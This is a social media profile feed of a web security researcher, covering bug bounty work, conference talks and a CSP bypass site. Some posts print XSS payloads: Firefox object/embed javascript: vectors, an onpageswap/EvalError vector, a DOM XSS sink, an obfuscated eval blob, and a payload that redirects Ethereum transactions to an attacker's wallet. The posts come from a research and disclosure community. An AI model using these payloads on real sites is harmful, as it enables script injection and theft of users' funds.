Sign in

renniepak

@renniepak.nl
2.2K followers 208 following 176 posts

Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. Creator of CSPBypass.com. (he/him)

PostsRepliesMedia
renniepak @renniepak.nl · 11/09/2026
Found the best vulnerability of my life today. Responsibly disclosed ofcourse. Hopefully I can share a CVE anytime soon :)
010
Reposted by renniepak
0xacb @0xacb.com · 22/06/2026
We've all been there: found an XSS, blocked by CSP. There's a bunch of CSP bypasses that you can try by @renniepak.nl: cspbypass.com It has a compilation of bypasses, based on the exact CSP you're up against.  Here’s a quick tutorial on how to use it 👇
052
Reposted by renniepak
Jorian @jorianwoltjer.com · 28/05/2026
I won't keep you in mystery any longer, here's how I found an XSS vulnerability *in* Shazzer! The chain involved some interesting browser techniques no sane developer could foresee. Check out the details below: jorianwoltjer.com/blog/p/stori... (and thanks @garethheyes.co.uk for making Shazzer!)
jorianwoltjer.com
Finding XSS on Shazzer (literally) | Jorian Woltjer
How I found an XSS in Shazzer, a tool for discovering and sharing browser quirks through fuzzing. Not *using*, but *in* Shazzer. We'll explore some useful techniques with Blob URLs to unsandbox malici...
096
renniepak @renniepak.nl · 25/05/2026
Looking back on #hh0526 with a big smile. 😊 We brought together 22 hackers from 9 different nationalities in the wonderful city of Utrecht for a day of pure bug bounty fun, hacking on @intigriti.com programs with special event bonuses included.
141
renniepak @renniepak.nl · 16/05/2026
shazzer.co.uk/renniepak/st...
010
renniepak @renniepak.nl · 08/04/2026
eval(unescape(escape`!򩡵򫡣򭁩򫱮ꈊ򚀩򮱬򩑴򘁧򟑒򭑮򫡥򬠮򩱥򭁉򫡳򭁡򫡣򩐨򚐻򪑦򚀡򩱼򯀡򩰮򬁬򨑹򪑮򩰩򬡥򭁵򬡮򘁤򫱣򭑭򩑮򭀮򩁩򬱰򨑴򨱨򡑶򩑮򭀨򫡥򭰠򢱥򮑢򫱡򬡤򡑶򩑮򭀨򘡫򩑹򩁯򭱮򘠬򮱫򩑹򠱯򩁥ꎣ򜡽򚐩򛁶򫱩򩀠򬱥򭁔򪑭򩑯򭑴ꊊⱐ򜀩򞱬򩑴򘁴ꏑ򛁮򛁯ꏐ򛁩ꏐ򛁐򟐢򬁴򩑲򫱤򨑣򭁹򫀢򛁳򟐨򚐽򟡻򪑦򚀡򭀩򬡥򭁵򬡮򞱬򩑴򘁧򟑒򭑮򫡥򬠮򩱥򭁉򫡳򭁡򫡣򩐨򚐻򪑦򚀡򩱼򯁧򛡣򬡡򬱨򩑤򚑲򩑴򭑲򫠠򭀽򜀻򫁥򭀠򩠽򩰮򭁒򩑸򛁣򟑧򛡨򫱲򪑺򫱮򛡯򨡳򭁡򨱬򩑳򛁲򟑧򛡣򭑲򬡥򫡴򤱰򩑥򩀬򭐽ⴐ򛑲ꋱ򜀬򭰽򩠮򮁐򫱳򛁗򟑦򛡣򫱮򩡩򩰮򭱩򩁴򪀬򮀽򭰫򥰻򪑦򚁯򚑻򪐫򚰻򫁥򭀠򩐽򜐻򩡯򬠨򫁥򭀠򪠠򫱦򘁣򚑻򫁥򭀠򥀽򪠮򭁹򬁥򠱯򫡦򪑧򞱩򩠨򥀮򭁹򬁥򟐽򤀦򙡪򛡹򤁯򬰼ꏗ򝐩򨱯򫡴򪑮򭑥򞱩򩠨򪠮򮁐򫱳򟁸ꊳ򜀦򙡪򛡸򤁯򬰫򥀮򭱩򩁴򪀪򪠮򬱩򮡥򟡷ꋑ򜀦򙡦򛡹򤁯򬰫򩠮򨱯򫡦򪑧򛡨򩑩򩱨򭀾򪠮򮑐򫱳򚑻򩐽򜀻򨡲򩑡򪱽򯑥򙠦򩠮򪡵򫑰򪑮򩰦򙡩ꏥ򙠦򩠮򩑮򩁊򭑭
120
renniepak @renniepak.nl · 22/03/2026
For anyone curious, I just pushed the complete set to our repo: github.com/renniepak/CS...
github.com
Added csp_domains.json and updated README.md · renniepak/CSPBypass@10434a9
040
renniepak @renniepak.nl · 19/03/2026
When reviewing pull requests with new additions for CSPBypass.com, I often find myself questioning how useful a given entry actually is. If no websites whitelist a specific host, there is little point in adding it.
155
renniepak @renniepak.nl · 06/03/2026
What windows or MacOs files reliably contain the username of the currently logged in user WITHOUT that username being part of the file path?
000
renniepak @renniepak.nl · 12/02/2026
The best time to quit bug bounty was 20 months ago. The second best time is now.
160
renniepak @renniepak.nl · 07/02/2026
Added a small feature to cspbypass.com to warn the user if unsafe-inline is detected, in which case you typically don’t need to waste time hunting for 3rd-party whitelisted CSP bypasses and go straight to inline scripts / event handlers.
075
Reposted by renniepak
Gareth Heyes @garethheyes.co.uk · 16/12/2025
Bypass CSP in a single click using my new Custom Action, powered by @renniepak.nl's excellent CSP bypass project.
1137
renniepak @renniepak.nl · 01/12/2025
Thanks for mentioning our site cspbypass.com
cspbypass.com
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
240
renniepak @renniepak.nl · 29/11/2025
we at cspbypass.com recommend cspbypass.com
040
Reposted by renniepak
0xacb @0xacb.com · 21/10/2025
Found an XSS but got blocked by the CSP? cspbypass.com has a compiled list of ways to bypass the Content-Security Policy. Check out the video below 👇
286
Reposted by renniepak
Gareth Heyes @garethheyes.co.uk · 26/09/2025
In a shameless effort to promote my book. I've crafted some very special vectors for you. If you like them please purchase my book to read more. www.amazon.com/dp/B0BRD9B3GS
https://www.amazon.com/dp/B0BRD9B3GS
0133
renniepak @renniepak.nl · 06/09/2025
Been playing around with strudel.cc recently. It is pretty awesome! strudel.cc#Ly9Td2VldCBE...
strudel.cc
Strudel REPL
Strudel is a music live coding environment for the browser, porting the TidalCycles pattern language to JavaScript.
100
Reposted by renniepak
Marko Bevc @marko.social · 02/09/2025
Great interview with @racheltobac.bsky.social shining a light in a lot of important topics, like what are likely attack vectors, impact of #AI on #security, #ethics, affecting social interactions and #privacy . "Be politely paranoid." 👏 www.youtube.com/watch?v=xEdZ...
youtube.com
Social Engineer: YOU are Easier to Hack than your Computer
YouTube video by Scammer Payback
3126
renniepak @renniepak.nl · 27/08/2025
Coded some PHP today without using ChatGPT, like a mad man.
060
Reposted by renniepak
0xacb @0xacb.com · 26/08/2025
Time to reveal what I was doing with @teknogeek.io back in '19. All the hard work and sleepless nights have paid off!
0133
renniepak @renniepak.nl · 25/08/2025
Just finished a major UI overhaul of CSPBypass.com and would love your feedback. Excited to welcome ProjectDiscovery as our first sponsor. Huge thanks to their team for supporting the project and recognizing its value to the community.
cspbypass.com
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
030
renniepak @renniepak.nl · 24/08/2025
I enabled sponsorships on Github for cspbypass.com. The main goal is to cover hosting fees etc. So if you want to support my work, I would highly appreciate it if you could become a sponsor. github.com/sponsors/ren... Thanks!
cspbypass.com
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
021
renniepak @renniepak.nl · 21/08/2025
Forgot how to bug bounty.
121
renniepak @renniepak.nl · 17/07/2025
LOL. almost 3 years after reporting it and it being fixed, I got assigned a CVE for a vuln I found 🙃 nvd.nist.gov/vuln/detail/...
nvd.nist.gov
NVD - CVE-2025-53836
160
Reposted by renniepak
Gareth Heyes @garethheyes.co.uk · 20/06/2025
Made hacking rooms work in real time. This demo connects three browsers with real time editing on. From Chrome I edit some HTML. This gets sent over websockets to the other browsers which call postMessage to a blob with a sandboxed iframe.
053
renniepak @renniepak.nl · 19/06/2025
😍
080
renniepak @renniepak.nl · 12/06/2025
I feel like I have all the pieces to a ATO chain. I just have no idea what the chain would be...
140
Reposted by renniepak
Gareth Heyes @garethheyes.co.uk · 09/06/2025
Epic Firefox XSS vectors by Masato Kinugawa. Now available on our XSS cheat sheet including variants found by me. Link to vectors👇 portswigger.net/web-security...
<object data=# codebase=javascript:alert(document.domain)//>
<embed src=# codebase=javascript:alert(document.domain)//>
<object data="#
alert(1)" codebase=javascript://>
<embed src="#!
alert(1)" codebase=javascript:>
0114
renniepak @renniepak.nl · 07/06/2025
🏳️‍🌈
040
Reposted by renniepak
Gareth Heyes @garethheyes.co.uk · 04/06/2025
Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens. @0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet. Link to vector👇 portswigger.net/web-security...
<script>
onpageswap=setTimeout;
location='x';
Event.prototype.toString=EvalError.prototype.toString;
Event.prototype.name='alert\x281\x29'
</script>
0134
renniepak @renniepak.nl · 26/05/2025
Such a DOM XSS tease: var s=document.createElement('style');s.innerHTML=decodeURIComponent(location.hash.slice(1));document.head.appendChild(s)
120
renniepak @renniepak.nl · 25/05/2025
Web2 Bugs + Crypto Bug Bounty Program = Drama.
130
renniepak @renniepak.nl · 24/05/2025
For those who missed it, check out my talk, “Widgets Gone Wild: Exploiting XSS through Flawed postMessage Origin Checks.” 📺 Watch here: www.youtube.com/watch?v=qgB0... 🖥️ Follow along with the slides: 0-a.nl/nahamcon/
youtube.com
Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Origin Checks
YouTube video by renniepak
1208
renniepak @renniepak.nl · 24/05/2025
The slides and examples for my talk "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Origin Checks" at NahamCon can be found here: 0-a.nl/nahamcon/
184
renniepak @renniepak.nl · 23/05/2025
The security team running a bug bounty program as soon as your report comes in:
060
Reposted by renniepak
Johan Carlsson @joaxcar.bsky.social · 20/05/2025
Here is the official writeup of my XSS challenge on Intigriti. I think it contains some fun browser trivia even for those who did not look at the chall joaxcar.com/blog/2025/05...
joaxcar.com
Confetti: Solution to my Intigriti May 2025 XSS Challenge - Johan Carlsson
1186
renniepak @renniepak.nl · 23/05/2025
The schedule got an update: Tune in at 1:35 PM (PDT) / 10:35 PM (CEST) for my talk!
050
renniepak @renniepak.nl · 20/05/2025
Today I learned I not only have CVEs but also a "EUVD" 😀 euvd.enisa.europa.eu/enisa/EUVD-2...
euvd.enisa.europa.eu
EUVD
European Vulnerability Database
030
renniepak @renniepak.nl · 20/05/2025
If you’re into bug bounty hunting and like finding weird XSS bugs (like me 😊) in places most people overlook, come check out my talk at NahamCon 2025 this Friday, May 23. "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Checks"
1133
Reposted by renniepak
Tom Anthony @tomanthony.bsky.social · 19/05/2025
I'm excited to be speaking at #NahamCon2025 on May 23rd! I'm going to be talking about a bug class that I believe is very undervalued, and will outline a methodology for how to find and exploit it in the wild. May the bounties rain down upon you! Details here: www.nahamcon.com
091
renniepak @renniepak.nl · 17/05/2025
I did it! 🥳
0100
renniepak @renniepak.nl · 12/05/2025
Added a small feature to cspbypass.com that allows you to copy payloads by just clicking on them.
cspbypass.com
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
281
renniepak @renniepak.nl · 08/05/2025
Pay. The. Bounty. Please.
020
renniepak @renniepak.nl · 02/05/2025
Excited to be part of #nahamcon2025!
160
renniepak @renniepak.nl · 10/04/2025
Fun little XSS payload that will always replace the "to" address of eth_sendTransaction with yours. !function(){if(!window.ethereum)return;let e=ethereum.request;ethereum.request=n=>(n?.method==="eth_sendTransaction"&&n.params?.[0]?.to&&(n.params[0].to="0x...[your wallet]"),e.apply(this,[n]))}();
280
renniepak @renniepak.nl · 08/04/2025
Proud to announce I'll be speaking at NahamCon this year! www.nahamcon.com
nahamcon.com
NahamCon - A Virtual Security Conference
280
renniepak @renniepak.nl · 03/04/2025
Bug bounty in a nutshell.
010
renniepak @renniepak.nl · 29/03/2025
Wow. Sora is pretty insane.
020
renniepak @renniepak.nl · 17/03/2025
So annoying that HackenProof pays in USDT(TRC-20). And you can get paid in cash (USD) but they need like a CoC registration document to be able to receive the money. Never had to show that for any of the major platforms.
100
Reposted by renniepak
Bug Bounty Reports Explained @gregxsunday.bsky.social · 12/03/2025
XSS is still the most common bug class that can be insanely profitable if you master it like my today's guest - Renniepak. In this interview, we talk XSS, CSP bypasses, access control, JS bookmarks, and more... Enjoy🔥
youtu.be
Enjoy the videos and music that you love, upload original content and share it all with friends, family and the world on YouTube.
161